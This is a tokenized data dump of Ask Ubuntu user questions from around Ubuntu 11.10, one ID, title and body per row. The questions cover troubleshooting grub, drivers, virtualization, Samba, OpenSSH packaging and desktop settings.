/cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom # -- -my additions -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- - [ raoul ] # comment = ubuntu file server share path = /home/home/raoul browsable = yes guest ok = yes read only = no create mask = 0755 available = yes public = yes writable = yes
100797	how do i configure thunderbird to send plain text emails by default ?	title pretty much says it all . i want to tell thunderbird to edit and send emails in plain text by default . how do i do that ?
100798	slow wacom on virtualbox . is it possible to solve it ?	i have a wacom bamboo that works out-of-the-box on ubuntu 11.10 ( even pressure ) . the problem , though , comes when using it on virtualbox . if i do n't allow vb to access it , it recognizes the tablet as a mouse and works well ( the same as when you plug the tablet the first time in windows [ normally , not on vb ] and do n't install the drivers ) . however , when i install the drivers and allow vb to access the tablet via `` usb devices '' it becomes really slow . i get pressure-sensitivity in photoshop , but in exchange of a lag of seconds . the question is.. is there a chance to solve this or is this something inevitable when using a tablet through virtualbox ? sorry , forgot some info : virtualbox version is 4.1.8 ( oracle version , not the ose ) , guest is windows 7 ( though i think it happened the same in xp ) .
100810	asus k53e wont hibernate/suspend	i just recently installed ubuntu 11.10 on my laptop . everything works great however when i get it to hibernate my screen turns black but still backlit and my cpu is still running . how can i fix this ?
100813	what tools do i need to use to report a bug in a developers ppa ?	when you want to report an error the best way to report a package in ubuntu is sudo ubuntu-bug-package . but what if the package is in a developers ppa and i want to report an error with enough information , what tools can i use to generate that necessary information ?
100815	update-grub fails due to syntax error	when i run the command `` sudo update-grub '' following is the output : kamil @ kamil-mg-63mi-7109 : ~ $ sudo update-grub [ sudo ] password for kamil : generating grub.cfg ... found linux image : /boot/vmlinuz-3.0.0-15-generic found initrd image : /boot/initrd.img-3.0.0-15-generic found linux image : /boot/vmlinuz-3.0.0-14-generic found initrd image : /boot/initrd.img-3.0.0-14-generic found memtest86+ image : /boot/memtest86+.bin found ubuntu 11.10 ( 11.10 ) on /dev/sda1 error : syntax error . error : incorrect command . error : syntax error . error : line no : 101 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached . done kamil @ kamil-mg-63mi-7109 : ~ $ uname- a no command 'uname- ' found , did you mean : command 'uname ' from package 'coreutils ' ( main ) uname- : command not found kamil @ kamil-mg-63mi-7109 : ~ $ uname -a linux kamil-mg-63mi-7109 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:34:47 utc 2011 i686 i686 i386 gnu/linux kamil @ kamil-mg-63mi-7109 : ~ $ the file contents etc/default/grub is this : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash nomodeset video=uvesafb : mode_option=1024x768-24 < < , mtrr=3 , scroll=ywrap '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode=1024x768 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' the contents of grub.d are here http : //ubuntuone.com/0exs51bd2boe5gfc2fdlni i do n't know how this happened but this is where i am stuck .
100821	2 disks dual partitioning with windows7 and ubuntu	hey i was wondering if anyone knew of a good tutorial how to do this ? i have the windows on installation in the first disk and have a second disk devoted to ubuntu . last time i tried to partition i ended up getting a black screen that did n't allow me to boot either os . i think i might have made a mistake with the partitioning step of the installer . any help would be greatly appreciated .
100823	saving ssh shell links in launcher like putty	i mean how can i bookmark a ssh root @ ip command in the launcher so when i click on the icon and a shell is prompt to me asking credentials for the connection to the server shell ?
100827	i 'm not receiving firefox updates , what is wrong ?	here : https : //launchpad.net/~mozillateam/+archive/firefox-stable it is said : aimed at lucid and maverick users who want to use a modern browser which starts faster than you can brew your morning coffee can you tell me which ppa should i use to have latest stable firefox all the time ? like for chrome . the other questions are closed but they do n't answer the question ! for example here : how do i install the latest stable version of firefox ? it 's about versions prior to 11.04 . i have oneiric and firefox 9.0.1 , but firefox 10 was released couple of days ago . may be i just need to wait ? here is my sources.list ( i have deleted all comments ) deb http : //us.archive.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric main restricted deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb http : //us.archive.ubuntu.com/ubuntu/ oneiric universe deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ oneiric multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb http : //extras.ubuntu.com/ubuntu oneiric main deb-src http : //extras.ubuntu.com/ubuntu oneiric main
100834	importing google contacts to kaddressbook ?	i ca n't seem to figure out just how to import google contacts to my kadressbook . do i have to email myself the .csv file or do i put it on a flash , or what ?
100840	openssh 5.9p1 on ubuntu 11.10	i want to build a deb package with the latest version of openssh from source . then i want to install it on my machine . i am running : linux ubuntu-1110-oneiric-64-minimal 3.0.0-12-server # 20-ubuntu smp fri oct 7 16:36:30 utc 2011 x86_64 x86_64 x86_64 gnu/linux to achieve my goal i do : wget ftp : //ftp.openbsd.com/pub/openbsd/openssh/portable/openssh-5.9p1.tar.gz wget ftp : //ftp.openbsd.com/pub/openbsd/openssh/portable/openssh-5.9p1.tar.gz.asc gpg openssh-5.9p1.tar.gz.asc apt-get build-dep openssh-server openssh-client apt-get source openssh-server cd openssh-5.8p1/ uupdate -v 5.9p1 /root/packages/openssh/openssh-5.9p1.tar.gz cd ../openssh-5.9p1 dpkg-buildpackage -us -uc -nc but i get an error : make [ 1 ] : entering directory `/root/packages/openssh/openssh-5.9p1' rm -f debian/tmp/etc/ssh/sshd_config dh_install -nopenssh-client-udeb -nopenssh-server-udeb -- fail-missing cp : can not stat `debian/tmp/usr/bin/ssh-vulnkey ' : no such file or directory dh_install : cp -a debian/tmp/usr/bin/ssh-vulnkey debian/openssh-client//usr/bin/ returned exit code 1 make [ 1 ] : *** [ override_dh_install ] error 2 make [ 1 ] : leaving directory `/root/packages/openssh/openssh-5.9p1' make : *** [ binary ] error 2 dpkg-buildpackage : error : debian/rules binary gave error exit status 2 any ideas what do i do to make this work ?
100844	how do i activate the broadcom wireless driver ?	i have downloaded the drivers that are supposed to fix my wireless problem . the problem is the instructions do not seem to fit the new gui . here are the instructions : from the gui : package manager ( system > administration > synaptic package manager ) . click the reload button in the upper left corner of synaptic to refresh your index then search for and reinstall the package named bcmwl-kernel-source . with the new gui , where do i go ? there is no 'system ' any more . dash ca n't find 'synaptic package manager ' .
100845	installing ubuntu to external harddrive	if i were to install ubuntu 11.10 on my 500gb external hard disk , will grub mess with the mbr of windows 7 in my internal hd ? i once dual booted windowsxp and ubuntu in two different internal disks connected to the same pc . grub automatically became the default boot loader . i do n't want to mess with my windows7 installation . i just want ubuntu on my external hd and grub should load only when i boot from my external hd . also , should the entire external hd be used for the installation or will a partition of say 30gb work . i have my windows 7 auto backup in the same external hd too . does windows make the external hd bootable or something while storing the system images and backup files in my external hd , because then installing ubuntu also on the external hd might cause problems .
100850	vmware shared folders ubuntu guest win7 host	i installed vm tools via this tutorial . even tried to reinstall it few times with no effect . when i login and run sudo mount -t vmhgfs .host : /vmshared /mnt/hgfs i get error : can not mount filesystem : no such device /mnt/hgfs does exist , but is empty bash screen shared folder settings relevant questions : how do i mount shared folders ( win7 host ) in ubuntu ( guest ) using vmware ( tools v6 )
100852	why ubuntu sources are different to the originals ?	when i do : wget ftp : //ftp.openbsd.com/pub/openbsd/openssh/portable/openssh-5.8p1.tar.gz wget ftp : //ftp.openbsd.com/pub/openbsd/openssh/portable/openssh-5.8p1.tar.gz.asc gpg openssh-5.8p1.tar.gz.asc tar -zxvf openssh-5.8p1.tar.gz mv openssh-5.8p1 openssh-5.8p1_downloaded apt-get source openssh-server diff -r openssh-5.8p1 openssh-5.8p1_downloaded/ | wc -l i get loads of differences ( wc -l returns 3000 lines ) . why is that ?
100857	difference between `` daily-live '' , `` daily-preinstalled '' & `` daily '' ?	what are difference between `` daily-live '' , `` daily-preinstalled '' & `` daily '' builds of precise on http : //cdimages.ubuntu.com/ ?
100861	ubuntu 12.04 and intel/amd radeon hd5650	well just wanted to check and see if anyone knows the future for this combo ? got a laptop atm that runs win7 , but i wan na convert to ubuntu if possible . it got the built in intel gfx aswell as the radeon hd5650 1gb gfx , i have tried running fedora on it but the only good solution for saving its life was to use the switcheroo to turn it off . but i wan na be able to use the hd gfx card since i got it available , as it has been its only generating heat when not turned off . answers would be appreciated ( 1st q here )
100862	running jackd on startup / replacing pulseaudio	how can i replace pulseaudio with jack ? i want to start jackd on startup either during boot or during logon instead of pulseaudio .
100865	screen flickers after waking from blank screen	every time i lock my screen and then unlock it again i get a really annoying screen flicker that stays until the next reboot . it 's not like a graphic glitch it 's like the screen is refreshing at a wrong hz rate . any ideas for fixes ? specs : mobility radeon hd5470 graphic card with generic out of the box linux driver , ubuntu 11.10 64-bit with the 3.0.0-15-generic kernel . **i would like it if there 's a solution not involving the ati proprietary drivers , because they have been nothing but trouble on my machine in the past . thanks in advance
100870	sound is completely gone after temporarily muting my computer	i 've been using ubuntu for 2 months now , and the sound always worked fine . today i muted my computer for a while , and now the sound is completely gone , even after rebooting my computer a couple of times .
100872	changing keybindings for ubuntu using xmodmap fails	i 've changed some of the keybindings for my keyboard using xmodmap , i 've specifically changed my caps-lock key to point to ctrl_l and my ctrl_l key to point to super_l . this registers in xev but my caps-lock key still acts like the caps-lock key ( aka , pressing the physical caps-lock keys makes everything go like this ) during regular use , same with the control key acting like a ctrl key and not the super key ! i 'm using the swedish keyboard layout . my scavenging has led me to believe that xmodmaps configuration is overridden by xkb , i will continue my search . any idea what i can do to make my changes work ?
100874	how do i get my hp laserjet 5p working ?	ubuntu wo n't detect my hp laserjet 5p . i 'm on 10.04 . tried for hours to get printer to work . is there somewhere a software that says detect hardware ? do i need a software add-on to get it recognized ? got hplip to install . i had to update something to do with the software center . did that & then it let me download the hplip . it found my p2015 printer , but not my p5 .
100885	ubuntu on google ( android ) tv box for xbmc	it is possible to install ubuntu on a ( android ) google tv box like this ? i want to make a cheap xbmc box . i have seen success on a arm processor beagleboard . google tv boxes dus also run an arm . it needs to run opengl is this possible ? if it is possible it can give a boost for ubuntu ( tv ) and xbmc , a pc for 55 euro's update : it has a sv8860 processor , so opengl does not work . so i found a other a amlogic8726 processor
100889	how to secure ( ubuntu server ) linked through ddns	i have ubuntu server i use to access it through ddns & ubuntu server is running as guest os services running on ubuntu server apache ssh dns samba i m also looking for tools which email me if some try to do something ( if possible )
100893	dom u installation on ubuntu 11.10	i am trying to add a domu operating system on ubuntu 11.10 . i have successfully installed xen . verified with xm info virsh-version which returns this : compiled against library : libvir 0.9.2 using library : libvir 0.9.2 using api : xen 3.0.1 running hypervisor : xen 4.1 . now when i tried to install domu it said : unable to connect to 'localhost:8000 ' : , in vmm . so , i followed this bug link . i could now start adding domu . when adding domu , in last stage , it gives the following error : unable to complete install : 'post operation failed : xend_post : error from xen daemon : ( xend.err `` error creating domain : device model '/usr/lib/xen/bin/qemu-dm ' not found '' ) ' traceback ( most recent call last ) : file '' /usr/share/virt-manager/virtmanager/asyncjob.py '' , line 44 , in cb_wrapper callback ( asyncjob , *args , **kwargs ) file `` /usr/share/virt-manager/virtmanager/create.py '' , line 1899 , in do_install guest.start_install ( false , meter=meter ) file `` /usr/lib/pymodules/python2.7/virtinst/guest.py '' , line 1223 , in start_install noboot ) file `` /usr/lib/pymodules/python2.7/virtinst/guest.py '' , line 1291 , in _create_guest dom = self.conn.createlinux ( start_xml or final_xml , 0 ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 1686 , in createlinux if ret is none : raise libvirterror ( 'virdomaincreatelinux ( ) failed ' , conn=self ) libvirterror : post operation failed : xend_post : error from xen daemon : ( xend.err `` error creating domain : device model '/usr/lib/xen/bin/qemu-dm ' not found '' ) i tried following this bug link that said , the bug is solved in the below package . when i run ./configure in this , i am getting an error : checking for libxml ... no checking libxml2 xml2-config > = 2.6.0 ... configure : error : could not find libxml2 anywhere ( see config.log for details ) . what is the problem ?
100898	how do i look up the hsync/vsync values for my monitor ?	i 'm trying to get my computer to use the correct resolution . for that i need to specify the horizontal and vertical sync values in the configuration file ( xorg.conf ) : section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 31.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection let 's say these values for horizsync and vertrefresh are somehow wrong for my monitor . where do i find the correct values ? note : this is a `` dummy '' question -- with the help from the chat , i already found part of the answer , and i am now going to add my own answer to document a solution that is hopefully universal .
100900	how do i set the correct monitor resolution with nvidia drivers for a monitor that does not send edid ?	i keep having trouble getting the correct monitor resolution - every time i reinstall , i happen to use a newer ubuntu release and the old tricks i used to know no longer work . instead of leaving a long trail of questions for every new release , i am looking for a more universal and timeless solution . what 's the correct way to set the correct monitor resolution with an nvidia gpu for a screen that does not send edid values ? note : this is a `` dummy '' question -- with the help from the chat , i already found the answer , and i am now going to add my own answer to document a solution that is hopefully universal .
100903	i want to import my email contacts from mac os x gmail account into thunderbird . how ?	i am running ubuntu on a vm . i want to import my email contacts from mac os x google mail account into thunderbird on linux . how ?
100905	why can ubuntu perform a shutdown from the gui even though it is prive on the command line ?	why can ubuntu perform a shutdown from the gui even though it is prive on the command line ? by what mechanism does it do so ?
100906	which directories at / is it safeish to move to a slower ( but much larger ) secondary drive ?	i took the path less traveled and installed ubuntu on my cr-48 . mostly this is a completely standard install , minus it using chromeos 's kernel ( for drivers ) but the main drawback is the 8gb ssd -- it became full rather quickly . at present i 'm looking at 320mb free on the drive . i purchased a 16gb sd card and mounted it for data access and was able to offload some files to it , but it 's highly under-utilized at the moment . i 'm going to modify the boot configuration and mount some other directories there . because it 's flash memory , i 'm thinking that good candidates are files that are written once and then read many times . i do n't mind slow loading times so much , but i want to avoid completely stalling my system while i 'm at it . i want to move /home to the external drive out of convenience -- i figure what configuration files are loaded do n't need to be super speedy for performance reasons , and i want to be able to throw stuff in downloads safely . is it safe to move /bin , or other things like /var and /etc ? the external drive is much slower than the ssd , but linux also has some of the best ram caching algorithms i 've ever seen . i do know i want to keep /opt on the ssd , as that 's where the chrome cache seems to end up , so i want that to be as fast as possible . i guess that 's a lot of buildup : my question is , which / directories in ubuntu linux need to be fast , and which directories can be moved to a slower drive without significantly impacting performance ?
100908	where do i get ndiswrapper v1.57 ?	i am trying to get my wireless adapter to work . according to some places , i need v 1.57 of ndiswrapper . there are instructions on how to compile it after making changes to the source , but i am not comfortable doing what is asked . i do n't know enough to know weather what i do works or screws up my system . where can i get a compiled 32 bit version of ndiswrapper for ubuntu 11.10 ?
100916	./configure not working	i am trying to install java 7 via tar.gz , but when it comes to the command `` ./configure '' , it says it do n't exist . i am using ubuntu 11.10 with latest updates . the manual i looked is this : http : //www.cyberciti.biz/faq/install-tarballs/
100917	ati catalyst drivers slowness	i have managed to install the drivers , but after installing those drivers moving different windows such as browser is very laggy . why is that ? i also tried older drivers , but they all have the same problem . i have ati radeon hd5850 . i installed this driver : amd catalystâ˘ 11.11 proprietary linux x86 display driver . i ca n't remember how i installed it , because i installed ubuntu again because of the drivers . all i remember that it was very easy . the file was .run . i have only one screen ( asus ve247** )
100918	getting xsession-errors after unity lens install	i apologize in advance if i am leaving something out here . please let me know what additional info is required , and i will be happy to post it . can you tell me what these error messages are , and how i can go about resolving them ? warn 2012-02-02 14:02:56 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /net/launchpad/lens/utilities does not exist warn 2012-02-02 14:02:56 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /net/launchpad/lens/utilities does not exist warn 2012-02-02 14:02:56 unity.iconloader iconloader.cpp:509 unable to load contents of file : ///usr/share/icons/unity-icon-theme/places/svg/category-installed.svg : error opening file : no such file or directory warn 2012-02-02 14:02:56 unity.iconloader iconloader.cpp:509 unable to load contents of file : ///usr/share/icons/unity-icon-theme/places/svg/category-available.svg : error opening file : no such file or directory warn 2012-02-02 14:02:56 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /net/launchpad/lens/askubuntu does not exist warn 2012-02-02 14:02:56 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /net/launchpad/lens/askubuntu does not exist i am also getting nautilus errors logged here . i do not remember what lenses i installed , or from where ( software center , manual install , etc ) .
100919	annoying screen flickers on msi u120	my screen brightness changes on my msi u120 when i log in . i can fix this by switching workspaces , and the screen will stay at a constant brightness . changing the brightness using the function keys triggers the problem again . occasionally if i change workspaces too late the touchpad will stop working . this happens on joli os too , but not on windows . interestingly , the flickering goes on at the logon screen in ubuntu , at which point i press control alt left / right . but , the flickering does not happen at the logon screen in joli os , but after i login it starts.any help would be greatly appreciated .
100923	installing ubuntu 11.10 from liveusb	i 'm trying to install 11.10 on my computer to dual boot it with windows 7 and when i 'm in the try linux area and try to install linux off of my liveusb i get to the point where its supposed to ask if i 'd like to install it alongside windows 7 , but it never shows that option it only shows the options to install over the entire hard drive and the advanced options one ie it never recognizes that i have anything else on my hard drive could someone help me ?
100925	unity links to usb drives do not open nautilus	whenever i press my usb drives in the unity launcher , i get the folder opened with gitk instead of with nautilus . the same happens when i connect them to the computer . how do i fix this ? this is happening in 11.10 .
100926	no unity session after update	after i updated ubuntu 11.10 , lightdm wo n't show the unity entry anymore . what can i do , to get the unity ( 3d ) entry back ? nv drivers are fully working . i installed gnome 3 weeks before .
100929	how to install latex package called `` standalone '' properly so i can get update with synaptic package manager ?	how to install latex package called `` standalone '' properly so i can get update with synaptic package manager ? i know i can manually download the file and install it .
100930	opencl broken on 11.10 , cuda works	i have two gpus , one is amd ( fglrx-updates ) and one nvidia ( nvidia-current ) , drivers from x-swat ppa . the amd card is used byt xorg ( without problems ) . both devices show up in lspci|grep vga : 01:00.0 vga compatible controller : ati technologies inc device 6718 02:00.0 vga compatible controller : nvidia corporation device 1200 ( rev a1 ) the nvidia kernel module is loaded ( dmesg|grep nvidia ) : [ 16.033488 ] nvidia 0000:02:00.0 : enabling device ( 0000 - > 0003 ) [ 16.033501 ] nvidia 0000:02:00.0 : pci int a - > gsi 40 ( level , low ) - > irq 40 [ 16.033507 ] nvidia 0000:02:00.0 : setting latency timer to 64 opencl problem i created /etc/opencl/vendors/nvidia.icd containing /usr/lib/nvidia-current/libcuda.so the device is detected , platform nvidia cuda , device geforce gtx 560 ti . however , no code gets compiled for the device , clbuildprogram always returns cl_build_rpogram_failure and querying clgetprogrambuildinfo crashes with uninformative backtrace # 0 0x00007ffff7442bef in ? ? ( ) from /lib/x86_64-linux-gnu/libc.so.6 # 1 0x00007ffff22c0e67 in ? ? ( ) from /usr/lib/nvidia-current/libcuda.so the program is build with cl.h from intel 's sdk ; that is ok since everything was fine until i installed the amd card alongside . running /usr/share/doc/python-pyopencl/examples/benchmark.py crashes just the same ( in pyopencl : :program : :get_build_info ) . any hint on what is wrong ?
100933	xps 14z : connect an external vga screen via mini display port	i have a xps 14z with an intel+nvidia video card , the optimus technology being handled with bumblebee version 3 . i know that the hdmi port , wired to the nvidia card is not supposed to work . however , the mini display port , wired to the intel card , should work . when i connect a vga cable on the minidisplay adaptor , no screen is recognised , nor with the graphical interface , nor with xrandr : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1366x768 60.0*+ 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) i know that a procedure compatible with bumblebee 2.4 exists here . but has it been adapted to bumblebee 3 ? i guess modifications of etc/bumblebee/xorg.conf.nvidia should do the job , but i 'm afraid to try without knowing precisely what i do ! thanks for your help , nathan
100937	help with ubuntu alonside windows 7	i have tried to install ubuntu alongside windows 7 as the instructions tell me , but when i run the installer and it 's towards the end , i get and error . here is the log : http : //pastebin.com/a55vqje4 please help me i just got this computer and want to put ubuntu on it like my last . thanks jake p.s . it says permission error
100945	how do i update the bios of a dell laptop ?	i have installed ubuntu 11.10 on a vista laptop , but dell is providing the bios update in .exe format currently my bios version is a09 but on the driver download site the latest version of bios is a011 . help me out to update the bios . my laptop information : libsmbios version : 2.2.28 product name : studio 1537 vendor : dell inc. bios version : a09 system id : 0x029f service tag : hbvv2bs express service code : 37723945096 upon running sudo update_firmware i get the following set of errors : e : unable to locate package pci-firmware-ven-0x8086-dev-0x2919-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2919 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2930-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2930 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2929-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2929 e : unable to locate package pci-firmware-ven-0x1180-dev-0x0832-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x1180-dev-0x0832 e : unable to locate package pci-firmware-ven-0x8086-dev-0x294a e : unable to locate package pci-firmware-ven-0x8086-dev-0x2448 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2946 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2940 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2942 e : unable to locate package pci-firmware-ven-0x1002-dev-0xaa28-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x1002-dev-0xaa28 e : unable to locate package pci-firmware-ven-0x1002-dev-0x95c4-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x1002-dev-0x95c4 e : unable to locate package pci-firmware-ven-0x14e4-dev-0x1698-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x14e4-dev-0x1698 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2936-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2936 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2935-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2935 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2934-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2934 e : unable to locate package pci-firmware-ven-0x8086-dev-0x293a-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x293a e : unable to locate package pci-firmware-ven-0x1180-dev-0x0822-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x1180-dev-0x0822 e : unable to locate package pci-firmware-ven-0x1180-dev-0x0592-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x1180-dev-0x0592 e : unable to locate package pci-firmware-ven-0x1180-dev-0x0852-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x1180-dev-0x0852 e : unable to locate package pci-firmware-ven-0x8086-dev-0x4232-subven-0x8086-subdev-0x1321 e : unable to locate package pci-firmware-ven-0x8086-dev-0x4232 e : unable to locate package pci-firmware-ven-0x8086-dev-0x293e-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x293e e : unable to locate package pci-firmware-ven-0x8086-dev-0x2a40-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2a40 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2937-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2937 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2938-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2938 e : unable to locate package pci-firmware-ven-0x8086-dev-0x2939-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2939 e : unable to locate package pci-firmware-ven-0x8086-dev-0x293c-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x293c e : unable to locate package pci-firmware-ven-0x8086-dev-0x2a41-subven-0x1028-subdev-0x029f e : unable to locate package pci-firmware-ven-0x8086-dev-0x2a41
100947	how to update wine to the latest version ?	i just formatted my laptop and got rid of windows 7 . yay ; - ) either way , wine is version 1.3.28 here , and i need it to update ( there are some bugfixes ) for my game so i need a more recent version . this is the version i got from the ubuntu software manager . how do i get a more recent version or wine version 1.4 ? i 've already added the repo into my repository , but still no updates . thanks in advance .
100954	grub2 boot loader does n't appear on boot	okay , install goes smoothly every time . no issues on that end . i let ubuntu decide where to place the boot loader . it 's usually /dev/sda . the issue i have is the boot loader . grub , does not show up when i boot my machine . it automatically boots into ubuntu without any action from my part . so i do not see a grub2 prompt . should i have installed the boot loader into a different partition to get the grub menu appear on boot ?
100957	how to control ups via nut rather than gnome-power-manager ?	i am trying to control my cyberpower 625va ups . from what i hear , this is best done via nut , rather than via the gnome-power-manager . see e.g . monitoring a ups with nut on debian or ubuntu linux | random bits but when i configure nut as described in that article , it fails : $ sudo upsdrvctl start network ups tools - ups driver controller 2.4.3 network ups tools - generic hid driver 0.34 ( 2.4.3 ) usb communication driver 0.31 ca n't claim usb device [ 0764:0501 ] : could not detach kernel driver from interface 0 : operation not permitted driver failed to start ( exit status=1 ) i then noted that it was already being monitored by gnome-power-manager . the article ( presumably now out-of-date ) had said i would need to install nut-hal-drivers in order to monitor it with the gnome power manager , so i had n't even looked up there on the indicator panel ... . but it was n't being monitored very well ( both the history and statistics tabs were useless ) , and what i really want is programmatic control . i do note that i can get some raw battery data via lshal -u /org/freedesktop/hal/devices/usb_device_764_501_noserial_if0_hiddev but i 'd prefer nut . so how to i tell the power manager to not monitor the ups , so nut will ( presumably ) ? fwiw , this situation is the same on both maverick and precise , on laptops in both cases .
100963	where should people give feedback on ubuntu ?	many people have opinions or want to give feedback about ubuntu . if they are simple bugs with a crash or display corruption , that 's fine , they can file in launchpad . but , comments about the design or concept of the system are more problematic . they come up all over the place , such as `` some unity feedback '' in other places that are not really about unity . ideally the answer will be a place where the comments will actually be read by the design team will tend to encourage people to read the existing comments and not post the same thing again and again perhaps will tend to bubble up good solutions rather than strange ideas will not be annoying to people who are trying to use that place for something else
100964	how to cancel a shutdown process invoked through a low battery state ?	usually i open a root window to have a chance to stop the invoked shutdown sequence because ubuntu must first ask for permission to close the root window . but several times later i forget that the shutdown sequence was initiated and close the root window . this leads to a shutdown even when the system is already back on the power line and recharging the battery . shutdown -c in a/the still open root window does n't work here .
100965	how to uninstall windows from a dual boot system ?	i installed ubuntu in the dual-boot configuration so that i can still boot up in windows . but i just want to get windows off of the machine . anyone know how to do this without having to go through another ubuntu install ? also are all of the ubuntu updates safe to take ? does ubuntu have restore points in case something goes haywire from the updates ?
100974	how can i click the `` home folder '' on dash to open another nautilus explorer when there is one already opened ?	i am using ubuntu 11.10 , and really satisfied with the unity . but there is one thing annoying me . if i click the home folder button on dash , and for example i want to copy some files from one folder to another . then i click the home folder again , but it will bring me to the previous folder not open a new nautilus explorer for me . and for the terminal , i can always press ctrl+alt+t to open a new window . so i 'm asking , is there any shortcut or any way to achieve it ?
100976	how can i write to /var/www ?	ok , i am trying to set up lamp . do a test run to make sure everything is working . i have no idea what permissions , apache , php , sql . clueless . i am following these instructions : https : //help.ubuntu.com/community/apachemysqlphp now , when i get down to testing php . it tells me to create that simple file and store it into the www directory . i ca n't . i opened a notepad editor , wrote the file , went to save it as the directory and it tells me i do not have permission to save the file . i do n't know who has permissions ? me ? my apache user ? i do n't have a clue . the tutorial just assumes one knows how to set permissions . how do i do this ? i apologize if this question has been asked before , but i could n't find it . this is the closest i 've came to an answer : help with lamp sever i just need a `` just type this into terminal - `` type of answer . i do n't care about permissions , it is a closed machine and just used for testing ...
